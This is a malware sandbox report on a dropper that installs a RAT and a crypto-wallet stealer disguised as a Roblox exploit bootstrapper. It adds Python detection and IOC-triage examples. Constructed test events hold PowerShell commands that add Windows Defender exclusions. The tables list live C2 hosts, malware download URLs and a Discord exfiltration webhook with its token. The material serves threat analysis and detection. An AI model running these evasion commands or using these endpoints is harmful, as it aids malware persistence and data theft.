Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 PowerShell | 21 Registry Run Keys / Startup Folder | 11 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 23 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 21 Registry Run Keys / Startup Folder | 21 Obfuscated Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 22 Software Packing | NTDS | 341 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 151 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 111 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 151 Virtualization/Sandbox Evasion | Proc Filesystem | 11 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph ID: 1556022 | Sample: 8Hd0ZExgJz.exe | Start date: 14/11/2024 | Architecture: WINDOWS | Score: 100

Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 22 other signatures
Contacted hosts: 23.ip.gl.ply.gg; www.nodejs.org; 6 other IPs or domains

Process tree (node numbers as in the graph):
8Hd0ZExgJz.exe (9)
  dropped: C:\Users\user\...\Windows Security Host.exe (PE32); C:\Users\user\AppData\Local\...\Injector.exe (PE32); C:\Users\user\...\BootstrapperV1.23.exe (PE32+); C:\Users\user\AppData\...\8Hd0ZExgJz.exe.log (CSV)
  +-- Windows Security Host.exe (16)
        network: 23.ip.gl.ply.gg 147.185.221.23, ports 26848, 49989, 49991, SALSGIVERUS, United States
        dropped: C:\Users\user\Windows Security Host.exe (PE32)
        signatures: Protects its processes via BreakOnTermination flag; Adds a directory exclusion to Windows Defender
        +-- powershell.exe (25): Loading BitLocker PowerShell Module
              +-- conhost.exe (42)
        +-- powershell.exe (28)
              +-- conhost.exe (44)
        +-- powershell.exe (30)
              +-- conhost.exe (46)
        +-- powershell.exe (32)
              +-- conhost.exe (48)
  +-- BootstrapperV1.23.exe (21)
        network: 127.0.0.1 (unknown); edge-term4-fra2.roblox.com 128.116.123.3, ports 443, 49704, ROBLOX-PRODUCTIONUS, United States; 2 other IPs or domains
        dropped: \Device\ConDrv (ISO-8859)
        signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
        +-- cmd.exe (34): Uses ipconfig to lookup or modify the Windows network settings
              +-- ipconfig.exe (50)
              +-- conhost.exe (52)
        +-- conhost.exe (36)
        +-- WerFault.exe (38)
  +-- Injector.exe (23)
        network: ip-api.com 208.95.112.1, ports 49702, 80, TUT-ASUS, United States
        signatures: Antivirus detection for dropped file; Found many strings related to Crypto-Wallets (likely being stolen)
        +-- WMIC.exe (40)
              +-- conhost.exe (54)
Windows Security Host.exe (12), started separately from the root node
Windows Security Host.exe (14), started separately from the root node
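The graph shows Windows Security Host.exe spawning four powershell.exe children and carrying the signature "Adds a directory exclusion to Windows Defender". The report does not print the command lines, so the detection below is an added example (not the report's Sigma rule and not the sample's own commands) that works on constructed process-creation records: it decodes any -EncodedCommand payload (base64 of UTF-16LE) before matching, because the exclusion cmdlet is invisible in the raw command line when it is encoded. The event layout, the sample command lines, and the cmdlet pattern are this example's assumptions.

```python
import base64
import re
from typing import List, Optional


def _is_encoded_flag(tok: str) -> bool:
    """powershell.exe accepts -ec and any unambiguous prefix of -EncodedCommand (-e, -enc, ...)."""
    if tok[:1] not in ("-", "/"):
        return False
    body = tok[1:].lower()
    return body == "ec" or (body.startswith("e") and "encodedcommand".startswith(body))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script carried by -EncodedCommand (base64 of UTF-16LE), or None if absent."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if _is_encoded_flag(tok):
            b64 = toks[i + 1]
            try:
                return base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


# Add-/Set-MpPreference with any -Exclusion* parameter in the same statement.
EXCLUSION_RE = re.compile(
    r"\b(?:Add|Set)-MpPreference\b[^\n;|]*?-Exclusion(?:Path|Process|Extension|IpAddress)\b",
    re.I,
)


def detect_defender_exclusion(events: List[dict]) -> List[dict]:
    """Alert on process-creation events whose (decoded) PowerShell adds a Defender exclusion."""
    alerts = []
    for ev in events:
        decoded = decode_encoded_command(ev["CommandLine"])
        script = decoded if decoded is not None else ev["CommandLine"]
        m = EXCLUSION_RE.search(script)
        if m:
            alerts.append({"ParentImage": ev["ParentImage"],
                           "encoded": decoded is not None,
                           "match": m.group(0)})
    return alerts


# Constructed process-creation records (Sysmon EID 1 / Security 4688 style). The real
# command lines run by the sample are not reproduced in the report text.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\user\AppData\Local\Temp\Windows Security Host.exe", "Image": PS,
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -NoProfile -EncodedCommand "
                    + base64.b64encode(
                        'Add-MpPreference -ExclusionPath "C:\\Users\\user"'.encode("utf-16-le")
                    ).decode()},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -enc "
                    + base64.b64encode("Get-MpComputerStatus".encode("utf-16-le")).decode()},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -Command \"Set-MpPreference -ExclusionProcess 'Injector.exe'\""},
]

if __name__ == "__main__":
    for a in detect_defender_exclusion(SAMPLE_EVENTS):
        print(a)
```

The parent image is kept in the alert on purpose: an exclusion added by a process running from %TEMP% or the user profile root, as here, is the discriminator from an administrator doing the same thing interactively.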

Source | Detection | Scanner | Label
8Hd0ZExgJz.exe | 61% | ReversingLabs | ByteCode-MSIL.Trojan.XWormRAT
8Hd0ZExgJz.exe | 100% | Avira | TR/Dropper.Gen
8Hd0ZExgJz.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\Injector.exe | 100% | Avira | HEUR/AGEN.1307507
C:\Users\user\Windows Security Host.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Injector.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | 100% | Joe Sandbox ML |
C:\Users\user\Windows Security Host.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | 29% | ReversingLabs | ByteCode-MSIL.Trojan.Heracles

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
https://ion=v4.5vn | 0% | Avira URL Cloud | safe
https://discord.com;http://127.0.0.1:6463/rpc?v=11 | 0% | Avira URL Cloud | safe
http://crl.microsP | 0% | Avira URL Cloud | safe
http://127.0.0.1:64632 | 0% | Avira URL Cloud | safe
https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip | 100% | Avira URL Cloud | malware
https://go.microso | 0% | Avira URL Cloud | safe
https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
23.ip.gl.ply.gg | 147.185.221.23 | true | true | | unknown
getsolara.dev | 104.21.93.27 | true | false | | high
edge-term4-fra2.roblox.com | 128.116.123.3 | true | false | | high
www.nodejs.org | 104.20.22.46 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high
clientsettings.roblox.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi | false | | high
127.0.0.1 | false | | high
23.ip.gl.ply.gg | false | | high
https://discord.com/api/webhooks/1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165SfLuSuU_8R57ng1lqsCx6o | false | | high
https://getsolara.dev/asset/discord.json | false | | high
https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live | false | | high
https://getsolara.dev/api/endpoint.json | false | | high
http://ip-api.com/line/?fields=hosting | false | | high
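The domain and URL tables mix real infrastructure (the ply.gg tunnel endpoint, the Discord webhook recovered from Injector.exe memory, the pages.dev download host) with vendor CDNs and documentation URLs embedded in libraries, and the sandbox's Malicious/Reputation columns do not separate them: the webhook URL is listed as Malicious: false, Reputation: high, yet a Discord webhook is exactly where an Umbral-style stealer posts collected data. The triage below is an added example, not code from the report or the sandbox vendor: it parses the rows (re-keyed here as pipe-delimited text, a constructed input copied from the tables above), applies its own verdict rules, and emits a blocklist. The allowlist, the rule set, and the verdict labels are this example's assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlsplit

# Rows copied from the report's domain and URL tables (constructed layout for this example).
# Columns: indicator | ip | malicious (sandbox verdict) | reputation
REPORT_ROWS = """\
23.ip.gl.ply.gg | 147.185.221.23 | true | unknown
getsolara.dev | 104.21.93.27 | false | high
edge-term4-fra2.roblox.com | 128.116.123.3 | false | high
www.nodejs.org | 104.20.22.46 | false | high
ip-api.com | 208.95.112.1 | false | high
https://discord.com/api/webhooks/1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165SfLuSuU_8R57ng1lqsCx6o | | false | high
https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe | | false | unknown
http://ip-api.com/line/?fields=hosting | | false | high
https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi | | false | high
https://contoso.com/License | | false | high
"""

# Infrastructure not worth blocking on the strength of this report (assumption of this example).
BENIGN_SUFFIXES = ("roblox.com", "nodejs.org", "microsoft.com", "contoso.com", "nuget.org",
                   "github.com", "apache.org", "schemas.xmlsoap.org", "newtonsoft.com", "aka.ms")


@dataclass
class Ioc:
    indicator: str
    host: str
    ip: Optional[str]
    sandbox_malicious: bool
    reputation: str
    verdict: str   # block / watch / benign / review (labels are this example's own)
    reason: str


def _host_of(indicator: str) -> str:
    return (urlsplit(indicator).hostname or "") if "://" in indicator else indicator.lower()


def _suffix_match(host: str, suffixes) -> bool:
    return any(host == s or host.endswith("." + s) for s in suffixes)


def classify(indicator: str, ip: Optional[str], malicious: bool, reputation: str) -> Ioc:
    """Rule-based verdict; pattern rules take precedence over the sandbox's own column."""
    host = _host_of(indicator)
    path = urlsplit(indicator).path if "://" in indicator else ""
    if _suffix_match(host, ("ply.gg",)):
        verdict, reason = "block", "playit.gg tunnel endpoint (C2)"
    elif host == "discord.com" and path.startswith("/api/webhooks/"):
        verdict, reason = "block", "Discord webhook (exfil channel); block the URL, not the domain"
    elif _suffix_match(host, ("pages.dev",)):
        verdict, reason = "block", "second-stage download host"
    elif host == "ip-api.com":
        verdict, reason = "watch", "hosting/data-center lookup (sandbox check), not C2"
    elif _suffix_match(host, BENIGN_SUFFIXES):
        verdict, reason = "benign", "vendor/library infrastructure"
    elif malicious:
        verdict, reason = "block", "sandbox verdict"
    else:
        verdict, reason = "review", "no rule matched; reputation " + reputation
    return Ioc(indicator, host, ip or None, malicious, reputation, verdict, reason)


def parse_rows(text: str) -> List[Ioc]:
    iocs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ind, ip, mal, rep = (c.strip() for c in line.split("|"))
        iocs.append(classify(ind, ip, mal.lower() == "true", rep))
    return iocs


def blocklist(iocs: List[Ioc]) -> List[str]:
    """Deduplicated 'block' indicators; URLs stay URLs so discord.com itself is not blocked."""
    return sorted({i.indicator for i in iocs if i.verdict == "block"})


if __name__ == "__main__":
    for i in parse_rows(REPORT_ROWS):
        print(f"{i.verdict:7s} {i.indicator[:60]:60s} {i.reason}")
    print(blocklist(parse_rows(REPORT_ROWS)))
```

The C2 port (26848) is only visible in the behavior graph, not in these tables, so a network block built from the tables alone should be keyed on the ply.gg hostname and IP rather than the port.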
Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:6463 | BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C2F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.nodejs.org | BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe | BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://crl.microsP | BootstrapperV1.23.exe, 00000004.00000002.1620001182.000001EFAF3F2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft.co | powershell.exe, 00000010.00000002.1355528661.000001E67BB20000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discordapp.com/api/v9/users/ | Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe.0.dr | false | | high
https://ncs.roblox.com/upload | BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CA9000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.nodejs.org | BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discord.com/api/webhooks/1303474825066446879/NebQ1EAeNBTUfzGkn_W4tnvKCl9pOSQ87UqZdaxri0p165S | Injector.exe, 00000002.00000002.1312728444.00000242BD751000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/vs/17/release/vc_redist.x64.exe | BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.dr | false | | high
http://crl.microso | powershell.exe, 0000001E.00000002.1802454253.000001F4EE624000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000010.00000002.1342493602.000001E610071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1449851078.0000019F3D1A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1578820555.00000195A422F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ip-api.com | Injector.exe, 00000002.00000002.1312728444.00000242BD846000.00000004.00000800.00020000.00000000.sdmp, Injector.exe, 00000002.00000002.1312728444.00000242BD85B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ion=v4.5vn | powershell.exe, 0000001C.00000002.1607943237.00000195AC969000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://127.0.0.1:6463/rpc?v=1 | BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96B31000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C2F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Injector.exe, 00000002.00000002.1312728444.00000242BD7DE000.00000004.00000800.00020000.00000000.sdmp, Windows Security Host.exe, 00000003.00000002.2478752394.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96BCD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1319923326.000001E600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1392785191.0000019F2D131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1497934585.00000195941C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1662679238.000001F4D5FB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://edge-term4-fra2.roblox.com | BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806- | Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe.0.dr | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000010.00000002.1342493602.000001E610071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1449851078.0000019F3D1A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1578820555.00000195A422F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discord.com | BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96B31000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discord.com/api/v10/users/ | Injector.exe.0.dr | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000010.00000002.1319923326.000001E600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1392785191.0000019F2D359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1497934585.00000195943E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 0000001E.00000002.1774304541.000001F4E601C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.23.dr | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://james.newtonking.com/projects/json | BootstrapperV1.23.exe.0.dr | false | | high
http://getsolara.dev | BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96BE6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discord.com;http://127.0.0.1:6463/rpc?v=11 | BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe.0.dr | false | Avira URL Cloud: safe | unknown
https://github.com/Blank-c/Umbral-Stealer | Injector.exe.0.dr | false | | high
https://go.microso | powershell.exe, 0000001E.00000002.1797731442.000001F4EE532000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://gitlab.com/cmd-softworks1/a/-/snippets/4768754/raw/main/endpoint.json | BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.dr | false | | high
https://getsolara.dev | BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96BCD000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://gitlab.com/cmd-softworks1/a/-/snippets/4768756/raw/main/discord.json | BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96B31000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe.0.dr | false | | high
http://127.0.0.1:64632 | BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C2F000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000010.00000002.1319923326.000001E600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1392785191.0000019F2D359000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1497934585.00000195943E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1662679238.000001F4D61DA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.newtonsoft.com/jsonschema | BootstrapperV1.23.exe.0.dr | false | | high
https://www.nuget.org/packages/Newtonsoft.Json.Bson | BootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe.0.dr | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000010.00000002.1319923326.000001E600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1392785191.0000019F2D131000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1497934585.00000195941C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1662679238.000001F4D5FB1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://clientsettings.roblox.com | BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi | BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CA5000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmp | false | |
                                                                                                                            high
                                                                                                                            https://pastebin.com/raw/pjseRvyKBootstrapperV1.23.exe, 00000004.00000000.1258106551.000001EF94D52000.00000002.00000001.01000000.00000008.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96C48000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.23.exe.0.drfalse
                                                                                                                              high
                                                                                                                              https://clientsettings.roblox.comBootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://ip-api.com/json/?fields=225545Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://4d38a1ec.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zipBootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96CCF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                  unknown
IP               Domain                       Country         ASN    ASN Name                 Malicious
208.95.112.1     ip-api.com                   United States   53334  TUT-AS (US)              false
128.116.123.3    edge-term4-fra2.roblox.com   United States   22697  ROBLOX-PRODUCTION (US)   false
147.185.221.23   23.ip.gl.ply.gg              United States   12087  SALSGIVER (US)           true
104.21.93.27     getsolara.dev                United States   13335  CLOUDFLARENET (US)       false
104.20.22.46     www.nodejs.org               United States   13335  CLOUDFLARENET (US)       false

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1556022
Start date and time: 2024-11-14 20:13:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 8Hd0ZExgJz.exe (renamed because the original name is a hash value)
Original Sample Name: 073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@31/33@5/6
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 11.1%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 96%
                                                                                                                                  • Number of executed functions: 235
                                                                                                                                  • Number of non-executed functions: 10
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 142.250.186.131, 52.168.117.173
                                                                                                                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, gstatic.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                  • Execution Graph export aborted for target 8Hd0ZExgJz.exe, PID 6440 because it is empty
                                                                                                                                  • Execution Graph export aborted for target BootstrapperV1.23.exe, PID 4064 because it is empty
                                                                                                                                  • Execution Graph export aborted for target Injector.exe, PID 2404 because it is empty
                                                                                                                                  • Execution Graph export aborted for target Windows Security Host.exe, PID 1316 because it is empty
                                                                                                                                  • Execution Graph export aborted for target Windows Security Host.exe, PID 608 because it is empty
                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 5112 because it is empty
                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7544 because it is empty
                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7864 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                  • VT rate limit hit for: 8Hd0ZExgJz.exe
Time      Type             Description
14:14:02  API Interceptor  1x Sleep call for process: WMIC.exe modified
14:14:04  API Interceptor  49x Sleep call for process: BootstrapperV1.23.exe modified
14:14:04  API Interceptor  57x Sleep call for process: powershell.exe modified
15:19:39  API Interceptor  1x Sleep call for process: WerFault.exe modified
15:20:07  API Interceptor  11921x Sleep call for process: Windows Security Host.exe modified
21:20:03  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run, value "Windows Security Host" = C:\Users\user\Windows Security Host.exe
21:20:12  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run, value "Windows Security Host" = C:\Users\user\Windows Security Host.exe
21:20:20  Autostart        Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk
